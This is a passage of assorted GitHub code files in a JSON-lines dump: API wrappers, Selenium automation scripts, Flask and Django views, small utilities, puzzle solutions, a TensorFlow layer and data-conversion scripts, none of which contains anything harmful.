IMDB rapidAPI \n    \n    Parameters:\n        None\n    Returns:\n    \n    List\n        A list of 100 strings of movie ids \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-most-popular-movies\"\n    \n    querystring = {\"purchaseCountry\":\"US\",\"homeCountry\":\"US\",\"currentCountry\":\"US\"}\n    \n    headers = {\n    'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    top_100_id = []\n    for i in response:\n        top_100_id.append(i[7:-1])\n    return(top_100_id)\n    \n#print(get_top_100())\n\ndef get_short_plot(movie_id):\n    '''\n    Gets the plot overview of a movie from IMDB rapidAPI \n    \n    Parameters:\n        movie_id(String): The id of a movie\n    Returns:\n    \n    String\n        A short plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n    \n    querystring = {\"tconst\":movie_id}\n    \n    headers = {\n    'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    plot = response[\"plots\"][0][\"text\"]\n    return(plot)\n    \n#print(get_short_plot(\"tt0110912\"))\n\ndef get_medium_plot(movie_id):\n    '''\n    Gets the plot overview of a movie from IMDB rapidAPI \n    \n    Parameters:\n        movie_id(String): The id of a movie\n    Returns:\n    \n    String\n        A medium-length plot overview of a movie \n    \n    '''\n    url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n    \n    querystring = {\"tconst\":movie_id}\n    \n    headers = {\n    'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    plot = response[\"plots\"][1][\"text\"]\n    return(plot)\n    \n#print(get_medium_plot(\"tt0110912\"))\n#\n#def get_long_plot(movie_id):\n#    url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n#    \n#    querystring = {\"tconst\":movie_id}\n#    \n#    headers = {\n#    'x-rapidapi-host': HOST_NAME,\n#    'x-rapidapi-key': API_KEY\n#    }\n#    \n#    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n#    response = response.json()\n#    plot = response[\"plots\"][2][\"text\"]\n#    return(plot)\n#    \n#print(get_long_plot(\"tt0110912\"))\n\ndef get_movie_year(movie_id):\n    '''\n    Gets 
the year of release of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n Integer\n The year of a movie\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_year = response[\"year\"]\n \n return(movie_year)\n\n#print(get_movie_year(\"tt0110912\"))\n\n\ndef get_movie_title(movie_id):\n '''\n Gets the title of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The title of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_title = response[\"title\"]\n \n return(movie_title)\n\n#print(get_movie_title(\"tt0110912\"))\n\ndef get_movie_details(movie_id):\n '''\n Gets all details of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n JSON\n JSON list containing movie title, id, image URL, image width, running time in minutes, title, title type and year\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n movie_details = response.json()\n #movie_title = response[\"title\"]\n \n return(movie_details)\n \n#print(get_movie_details(\"tt0110912\"))\n\ndef get_running_time(movie_id):\n '''\n Gets the running time of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The running time in minutes of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_running_time = response[\"runningTimeInMinutes\"]\n \n return(movie_running_time)\n\n#print(get_running_time(\"tt0110912\"))\n\ndef get_poster_url(movie_id):\n '''\n Gets the URL which contains the poster of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The URL of a movie poster\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n poster_url = response[\"image\"][\"url\"]\n \n return(poster_url)\n\n#print(get_poster_url(\"tt0110912\"))\n\n\n##NOT WORKING!!!\ndef get_actor_pic_url(actor_id):\n '''\n Gets the URL of an actor from IMDB rapidAPI from it's ID\n \n Parameters:\n actor_id(String): The id of an actor\n Returns:\n \n String\n The URL of a picture of an actor\n \n '''\n url = \"https://imdb8.p.rapidapi.com/actors/get-bio\"\n\n querystring = {\"nconst\":actor_id}\n \n headers = {\n 
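# RapidAPI authenticates every request with these two headers (host + key)\n        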
'x-rapidapi-host': HOST_NAME,\n    'x-rapidapi-key': API_KEY\n    }\n    \n    response = requests.request(\"GET\", url, headers=headers, params=querystring)\n    response = response.json()\n    actor_pic_url = response[\"image\"][\"url\"]\n    \n    return(actor_pic_url)\n\n#print(get_actor_pic_url(\"nm0001667\"))\n","repo_name":"karlgospel/IMDB_Movie_API","sub_path":"api_movies.py","file_name":"api_movies.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19933078224","text":"#encoding:utf-8\n\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\ndriver_path = r\"C:\\www\\chromedriver\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(executable_path=driver_path)\ndriver.get(\"https://www.baidu.com/\")\ninputTag = driver.find_element_by_id('kw')\nsubTag = driver.find_element_by_id('su')\n\nactions = ActionChains(driver)\n# move focus to the input box\nactions.move_to_element(inputTag)\nactions.send_keys_to_element(inputTag,'苍老师现在怎么样了')\nactions.move_to_element(subTag)\nactions.click(subTag)\n\nactions.perform()","repo_name":"gaohj/szpython_1812","sub_path":"day6/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36946542857","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndriver = webdriver.Chrome('C:\\\\webdrivers\\\\chromedriver.exe')\r\ndriver.get('https://www.speedtypingonline.com/typing-test')\r\n \r\nfor j in range(1, 10000000):\r\n    for i in range(0, 4):\r\n        for k in range(1, 1000): \r\n            try:\r\n                toSend = driver.find_element_by_xpath('//*[@id=\"blockLine'+str(i)+'\"]/span['+str(k)+']').text\r\n            except NoSuchElementException:\r\n                break\r\n\r\n            if(toSend == '\\xa0'):  # non-breaking space in the page source\r\n                toSend = ' '\r\n            actions = ActionChains(driver)\r\n            actions.send_keys(toSend)\r\n            actions.perform()\r\n    \r\n","repo_name":"Zachariah-Abraham/speedtypingonline_bot","sub_path":"ST.py","file_name":"ST.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"8410000657","text":"#!/usr/bin/python3\n#-*-coding:utf-8-*-\n\n__all__ = ['log', 'filehash', 'filetime', 'pathmake']\n\nimport os\nimport time\nimport socket\nimport hashlib\nimport threading\nimport uuid\n\n'''Unified logging output.'''\ntlock = threading.Lock()\ndef log(txt):\n    tlock.acquire()\n    print(\"\" + time.strftime('%Y-%m-%d %H:%M:%S') + \" \" + format(txt))\n    tlock.release()\n\n'''Compute the SHA-1 hash of a file.'''\ndef filehash(fp):\n    if not os.path.isfile(fp):\n        return ''\n    \n    while True:\n        try:\n            f = open(fp, 'rb')\n        except PermissionError:\n            time.sleep(1)\n            continue\n        else:\n            break\n    \n    hh = hashlib.sha1()\n    while True:\n        b = f.read(8096)\n        if not b:\n            break\n        hh.update(b)\n    f.close()\n    return hh.hexdigest()\n\n\n'''Check whether a file is complete.'''\n'''\ndef fileover(fp):\n    # wait a moment if the file size is still changing (PermissionError)\n    s1, s2 = 0, 1\n    while s1 != s2:\n        print(s1)\n        s1 = os.stat(fp).st_size\n        time.sleep(1)\n        s2 = os.stat(fp).st_size\n    return s1\nfileover(r'D:\\shell\\test\\Y470Y470PY570_WIN7x64.exe')\n'''\n    \n'''Recursively move a file or directory without raising.'''\n'''def surechange(path):\n    pass'''\n\n'''Recursively delete a file or directory without raising.'''\n'''def suredelete(path):\n    pass'''\n\n'''Recursively create directories without raising.'''\n'''def 
surecreate(path, fp=None):\n    try:\n        os.makedirs(path)\n    except FileExistsError:\n        pass\n    return True'''\n\n'''\nHuman-readable file size\nB/KB/MB/GB/TB/PB/EB/ZB/YB/BB\n'''\ndef getsize(byte, assoc=False):\n    assert byte >=0\n    size, unit = (0, 'B')\n    if byte < 1024:\n        size, unit = (byte, 'B')\n    elif byte/1024 < 1024 :\n        size, unit = (byte/1024, 'KB')\n    elif byte/1048576 < 1024 :\n        size, unit = (byte/1024/1024, 'MB')\n    elif byte/1073741824 <= 1024 :\n        size, unit = (byte/1024/1024/1024, 'GB')\n    elif byte / 1099511627776 <= 1024 :\n        size, unit = (byte/1024/1024/1024/1024, 'TB')\n    else:\n        size, unit = (byte/1125899906842624, 'PB')\n\n    if assoc == True:\n        return (size, unit)\n\n    return '%.2f %s'%(size, unit)\n\n\ndef getname():\n    return socket.getfqdn(socket.gethostname())\n\ndef getip(ifname='lo', ipv6=False):\n    # loopback address: LAN IP\n    return socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n    \n    # host address: WAN IP\n    '''import fcntl, struct\n    skt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    inet = fcntl.ioctl(skt.fileno(), 0x8915, struct.pack('256s',ifname[:15]))\n    return socket.inet_ntoa(inet[20:24])'''\n\ndef getmac(sep='-'):\n    mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n    return sep.join([mac[e:e+2] for e in range(0,11,2)]).upper()\n\n\n'''Generate a unique identifier for this machine from the host ID and a sequence number.'''\ndef computer():\n    return str(uuid.uuid1())\n\n'''Generate a random UUID.'''\ndef uniqid():\n    return str(uuid.uuid4().hex)\n\n    \nif __name__ == '__main__':\n    log(\"RUN:\")\n    log(filehash('utils.py'))\n\n\n    #surechange(r'D:\\shell\\test\\dd')\n    #suredelete(r'D:\\shell\\test\\dd')\n    #surecreate(r'D:\\shell\\test\\dd')\n\n    print(getsize(1024))\n    print(getsize(1048576))\n    print(getsize(1073741824))\n    print(getsize(1099511627776))\n\n\n    print(getname())\n    print(getip())\n    print(getmac())\n\n    print(computer())\n    print(uniqid())\n\n","repo_name":"backtent/syncfiles","sub_path":"lansync/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"27485013932","text":"import argparse\n\nfrom utils import read_trans_prompts, read_transfile\n\n\ndef get_data(fname: str, srcfname: str, tgtfname: str, prefix: str) -> None:\n    \"\"\"\n    This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\n    For training data, it combines the prompt with all accepted translations. 
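Each accepted translation becomes its own source/target line pair.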
\n For dev or test data, it combines the prompt only with the most popular translation.\n \"\"\"\n\n with open(fname) as f:\n lines = f.readlines()\n d = read_transfile(lines, strip_punc=False, weighted=True)\n id_text = dict(read_trans_prompts(lines))\n\n with open(srcfname, \"w\") as src, open(tgtfname, \"w\") as tgt:\n for idstring in d.keys():\n\n # prompt is combination of id and text.\n prompt = id_text[idstring]\n ats = d[idstring]\n\n # make sure that the first element is the largest.\n ats = sorted(ats.items(), key=lambda p: p[1], reverse=True)\n\n # if it is train\n if prefix == \"train\":\n # write all pairs.\n for p in ats:\n print(prompt, file=src)\n print(p[0], file=tgt)\n else:\n # write just the first pair (evaluate only on first line.)\n top_ranked_text = ats[0][0]\n print(prompt, file=src)\n print(top_ranked_text, file=tgt)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\")\n parser.add_argument(\"--fname\", help=\"Path of shared task file (probably something like train.en_vi.2020-01-13.gold.txt)\", required=True)\n parser.add_argument(\"--srcfname\", help=\"Name of desired src file, probably something like train_sents.en\", required=True)\n parser.add_argument(\"--tgtfname\", help=\"Name of desired tgt file, probably something like train_sents.vi\", required=True)\n parser.add_argument(\"--prefix\", help=\"One of [train, dev, test]\", choices=[\"train\", \"dev\", \"test\"])\n args = parser.parse_args()\n\n get_data(args.fname, args.srcfname, args.tgtfname, args.prefix)\n","repo_name":"duolingo/duolingo-sharedtask-2020","sub_path":"get_traintest_data.py","file_name":"get_traintest_data.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"35"} +{"seq_id":"9863162868","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n {\n 'author': 'Hameem N',\n 'title': 'Corona Teport',\n 'content': 'First post content',\n 'date_posted': 'April 20, 2018'\n },\n {\n 'author': 'Abc',\n 'title': 'dsdsdsd',\n 'content': 'Second post content',\n 'date_posted': 'April 21, 2018'\n }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"hameemtirur/Corona","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19067807524","text":"# ~*~ coding: utf-8 ~*~\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\nfrom django.views.decorators.csrf import csrf_protect\nimport os\n\nimport unittest\nimport sys\nimport re\n\nsys.path.insert(0, \"../..\")\n\nfrom ops.ansible.runner import AdHocRunner, CommandRunner\nfrom ops.ansible.inventory import BaseInventory\n\nhost_data = [\n {\n \"hostname\": \"keepalived1\",\n \"ip\": \"172.20.100.68\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n },\n {\n \"hostname\": \"keepalived2\",\n \"ip\": \"172.20.100.71\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n 
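# password intentionally commented out; the runner presumably authenticates with SSH keys\n    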
}\n]\n\ndef keepnet(request):\n return render(request, \"architecture/keepnet.html\")\n\n\nclass GetKeepIpaddr():\n def setUp(self):\n inventory = BaseInventory(host_data)\n runner = AdHocRunner(inventory)\n \n tasks = [\n {\"action\": {\"module\": \"shell\", \"args\": \"ip addr\"}, \"name\": \"ip_addr\"},\n {\"action\": {\"module\": \"shell\", \"args\": \"systemctl status keepalived\"}, \"name\": \"keepalived_ip\" },\n ]\n ret = runner.run(tasks, \"all\")\n keepIpList = []\n for x,y in ret.results_raw[\"ok\"].items():\n if re.search('Sending gratuitous ARP', y['keepalived_ip']['stdout'].split('\\n')[-1]):\n keepIpList.append(\n [y['keepalived_ip']['stdout'].split('\\n')[-1]+ \"
<br>++<br>\",\n                    y['ip_addr']['stdout'].split('2: eth0')[-1].replace(\"\\n\", \"<br>
    \")]\n )\n \n return keepIpList\n\ndef get_keep(request):\n if request.is_ajax():\n getIpaddr = GetKeepIpaddr()\n if getIpaddr.setUp() == []:\n receipt = json.dumps({\"status\": 1, \"info\": \"没有查询到或内部错误!\"})\n else:\n receipt = json.dumps({\"status\": 1, \"info\": getIpaddr.setUp()})\n\n return HttpResponse(receipt)\n","repo_name":"itcp/ly-cmdb","sub_path":"apps/architecture/views/keepnet.py","file_name":"keepnet.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"16347571923","text":"import unittest\n\nclass test_file(unittest.TestCase):\n\n def test_write01(self):\n file01 = open(\"file01.txt\", \"w\", encoding='utf-8')\n num = file01.write( \"第一行 \\n 第二行\" )\n print(num)\n file01.close()\n\n def test_write02(self):\n file02 = open(\"file02.txt\", \"rb+\")\n file02.write( b\"ancasgsdgdfkgktwelwklkerkgkjgksljr\" )\n # 移动到文件的第六个字节\n file02.seek(5)\n str01 = file02.read(1)\n print(str01)\n # 移动到文件的倒数第三字节\n file02.seek(-3, 2)\n str02 = file02.read(1)\n print(str02)\n file02.close()\n\n def test_read01(self):\n file01 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str01 = file01.read()\n print(str01)\n file01.close()\n\n def test_read02(self):\n file02 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str02 = file02.readline()\n print(str02)\n file02.close()\n\n def test_read03(self):\n file03 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str03 = file03.readlines()\n print(str03)\n file03.close()\n\n def test_read04(self):\n file04 = open(\"file01.txt\", \"r\", encoding='utf-8')\n for line in file04:\n print(line, end='')\n file04.close()","repo_name":"ghoobo/python_study","sub_path":"com/ghoobo/basis/test_12_file.py","file_name":"test_12_file.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4895609779","text":"# coding: utf-8\n\n# p(k) = p(k-1) + p(k-2) - p(k-5) - p(k-7) + p(k-12) + p(k-15) ...\n# 1, 2, 5, 7, ... 
は一般五角数\n#\n# https://ja.wikipedia.org/wiki/%E5%88%86%E5%89%B2%E6%95%B0\n\nfrom itertools import count, takewhile, cycle\n\n\ndef gen_ex_pentagonal():\n '''拡張五角数を生成する.'''\n for k in count(1):\n n = (3 * k - 1) * k // 2\n yield n\n\n # f(k) = (3k^2 - k) / 2 ==>\n # f(-k) = (3k^2 + k) / 2 ==>\n # = f(k) + k\n n += k\n yield n\n\n\ndef main():\n N = 10**6\n partitions = [1]\n signs = (1, 1, -1, -1)\n for n in count(1):\n p_n = 0\n for sign, k in zip(cycle(signs),\n takewhile(lambda k: k <= n, gen_ex_pentagonal())):\n p_n = (p_n + sign * partitions[n - k]) % N\n if p_n == 0:\n return n\n partitions.append(p_n)\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"AkihikoTakahashi/ProjectEuler","sub_path":"Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27082646297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom itertools import combinations\n\n# Complete the maximumPerimeterTriangle function below.\ndef maximumPerimeterTriangle(sticks):\n sticks_s = sticks\n perimeter = 0\n lengths = [-1]\n for i, j, k in combinations(range(len(sticks_s)), 3):\n s_i = sticks_s[i]\n s_j = sticks_s[j]\n s_k = sticks_s[k]\n aux_l = sorted([s_k, s_j, s_i])\n aux = sum(aux_l)\n if aux_l[0] + aux_l[1] > aux_l[2] and aux > perimeter:\n lengths = aux_l\n perimeter = aux\n \n return lengths\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n sticks = list(map(int, input().rstrip().split()))\n\n result = maximumPerimeterTriangle(sticks)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"polotto/HackerRank","sub_path":"other-problems/maximum-perimeter-triangle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"38469082740","text":"if __name__ == '__main__':\n print(\"*** Fun with Drawing ***\")\n n=int(input(\"Enter input : \"))\n inverse=bool(0)\n tri=int(1)\n for j in range((n-1)*4+1):\n for i in range ((n-1)*4+1):\n if i None:\n # Make sure the dirs in the filepath exist, create if needed\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n\n sorted_list = sorted(list(data.values()), key=sort_lambda)\n output_rows = [header_row]\n for item in sorted_list:\n output_rows.append(item_to_row_lambda(item))\n\n with open(output_filename, \"wt\") as out_file:\n tsv_writer = csv.writer(out_file, delimiter=\"\\t\")\n tsv_writer.writerows(output_rows)\n\n\ndef track_to_row(item) -> list:\n track_obj = item[\"track\"]\n return [\n track_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], track_obj[\"artists\"])),\n track_obj[\"album\"][\"name\"],\n item[\"added_at\"],\n track_obj[\"id\"],\n ]\n\ndef playlist_track_to_row(item) -> list:\n track_row = track_to_row(item)\n added_by_id = item[\"added_by\"][\"id\"]\n if added_by_id == '':\n # This has come up in debugging with Spotify owned (\"official\") playlists,\n # presumably because they're built different than \"regular\" playlists\n added_by_id = \"\"\n return [*track_row[:-1], item[\"added_by\"][\"id\"], *track_row[-1:]]\n\n\ndef album_to_row(item) -> list:\n album_obj = item[\"album\"]\n return [\n album_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], album_obj[\"artists\"])),\n item[\"added_at\"],\n 
album_obj[\"id\"],\n ]\n\n\ndef playlist_to_row(item) -> list:\n return [\n item[\"name\"],\n item[\"description\"],\n item[\"tracks\"][\"total\"],\n item[\"owner\"][\"id\"],\n item[\"collaborative\"],\n item[\"id\"],\n ]\n","repo_name":"riggspc/spotify-version-snapshots","sub_path":"utils/outputfileutils.py","file_name":"outputfileutils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36462081814","text":"\"\"\"\nFunctions to convert timestamps\n==============================\n\n\"\"\"\n\nfrom __future__ import print_function\nimport time\nimport datetime\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport pandas as pd\n\ndef date2datenum(d):\n ## Convert python datetime to Matlab datenum\n ##: input: Date as python datetime object\n ##: return: corresponding datenum\n return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\ndef datenum2date(datenum):\n ##Convert Matlab datenum into Python datetime.\n ##:input datenum Date in datenum format\n ##:return:Datetime object corresponding to datenum.\n d=np.array(datenum)\n return pd.to_datetime(d-719529,unit='D')\n\n\ndef calcTime_Mat2DOY(matlab_time):\n #### EXAMPLE OF USE:\n #### pytime = calcTime_Mat2DOY(matlab_time)\n\n print ('Converting MATLAB timesteps to DOY:')\n\n timestamps = pd.to_datetime(matlab_time-719529, unit='D')\n python_time = timestamps.dayofyear + (timestamps.hour / 24.0) + (timestamps.minute / 1440.0) + (timestamps.second / 86400.0)\n\n return python_time\n\ndef calcTime_Date2DOY(date):\n #### date should be forematted as YYYYmmDD\n\n print ('Converting date to DOY:')\n\n mm = date[4:6] #### month\n DD = date[6:8] #### day\n refDateAug = 226 #### Aug reference date for drift: 14th Aug 2018\n refDateSep = 243 #### Sep reference date for drift: 1st Sep 2018\n\n if mm == '08':\n doy = (float(DD) - 14.0) + refDateAug\n elif mm == '09':\n doy = float(DD) + refDateSep\n else:\n print ('****Date not valid with this function****')\n\n print ('----')\n print ('Date = ', date)\n print ('DOY = ', doy)\n print ('')\n\n return doy\n","repo_name":"JuVue/PYTHON","sub_path":"py_functions/time_functions.py","file_name":"time_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25680513514","text":"from ..layer_operation import LayerOperation\r\nimport tensorflow as tf\r\nimport re\r\nfrom initializer import get_initializer\r\nfrom regularizer import get_regularizer\r\n\r\n# WARNING: Only 2D convolution available\r\nclass op_tf_conv(LayerOperation):\r\n\r\n _attributes = \"\"\"[]\"\"\" # TODO: TO BE DEPRECATED\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n \"\"\"\r\n define convolution operation for input tensor\r\n outputs:\r\n output: convolution output\r\n \"\"\"\r\n # get input\r\n input_ = self.get_input('input')\r\n indim = self.get_dimension('input')\r\n\r\n # get attr\r\n # required field\r\n kernel_size = self.get_attr('kernel_size', default=None)\r\n if kernel_size is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('kernel_size', self.name))\r\n num_output = self.get_attr('num_output', default=None)\r\n if num_output is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be 
declared.'.format('num_output', self.name))\r\n\r\n # optional field\r\n padding = self.get_attr('padding', default='VALID')\r\n stride = self.get_attr('stride', default=1)\r\n bias_term = self.get_attr('bias_term', default=True)\r\n initializer = self.get_attr('initializer', default={'weight': {}, 'bias':{}}) # default will set later\r\n regularizer = self.get_attr('regularizer', default={}) # default will set later\r\n dilate = self.get_attr('dilate', default=None)\r\n scope = self.get_attr('scope', default='default')\r\n\r\n # get worker info: worker num, device type, device num\r\n device = self.get_attr('device')\r\n num = re.sub('[^0-9]', '', cluster.get('types')[device])\r\n type = cluster.get('types')[device].replace(str(num), '')\r\n\r\n # get shape array\r\n stride_shape = [stride, stride]\r\n weight_shape = [kernel_size[0], kernel_size[1], indim[3], num_output]\r\n dilate_shape = [dilate, dilate] if dilate is not None else None\r\n bias_shape = [num_output]\r\n\r\n\r\n with tf.variable_scope(self.name):\r\n # get weight for convolution\r\n with tf.variable_scope(scope):\r\n weight_init = get_initializer(initializer.get('weight'), is_bias=False)\r\n weight_reg = get_regularizer(regularizer, scope, is_bias=False)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n else:\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, weights)\r\n\r\n if bias_term:\r\n bias_init = get_initializer(initializer.get('bias'), is_bias=True)\r\n bias_reg = get_regularizer(regularizer, scope, is_bias=True)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n else:\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, biases)\r\n\r\n # construct API\r\n def apiConstructor():\r\n conv = tf.nn.convolution(input_, weights, padding,\r\n strides=stride_shape, dilation_rate=dilate_shape, data_format='NHWC')\r\n\r\n # if bias_term is True, add bias term to convolution output\r\n if bias_term:\r\n conv = tf.nn.bias_add(conv, biases, data_format='NHWC')\r\n\r\n # get output dimension\r\n outdim = list(conv.get_shape()[i].value for i in xrange(len(conv.get_shape())))\r\n\r\n # set output\r\n self.set_dimension('output', outdim)\r\n self.set_output('output', conv)\r\n\r\n # set tf summary\r\n tf.summary.histogram(self.name, conv)\r\n\r\n with tf.variable_scope(self.name):\r\n # single node, model parallelism: explicit worker mapping\r\n # data parallelism: equally duplicate model\r\n if learning_option.get(\"parallel\", None) != \"DP\":\r\n with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\r\n apiConstructor()\r\n else:\r\n apiConstructor()","repo_name":"KAIST-NCL/IDLE","sub_path":"src/DLMDL/LayerOperation/tf/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} 
+{"seq_id":"16717185996","text":"## CSV Data Munger/Cleaner/Shaper\n# Created by: Mitch Main\n# Created on: 9/25/14\n# Info: This imports a CSV file to be cleaned, allows you to define the number\n# of fields you would like to import, and then imports them from the file,\n# then it writes it to a cleaned file\n\n# Imports\nimport csv\nimport tkinter\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\nimport string\nimport itertools\nimport re\n\n\n\n## FUNCTION: GetFile()\n# The GetFile function gives the user a GUI interface to get the file directory\n# the function then returns a file directory as a string.\n# @input: From UI Dialog Box\n# @return str: filedir\n# @return int: collumn\n\ndef GetFile():\n filedir = askopenfilename(title='Open File')\n return filedir\n\n\n\n##FUNCTION: TxtWriter(fieldList, headerList)\n# TxtWriter writes the the field lists to the output file as a tab delimited file\n# for easy uploading to a SQL server or 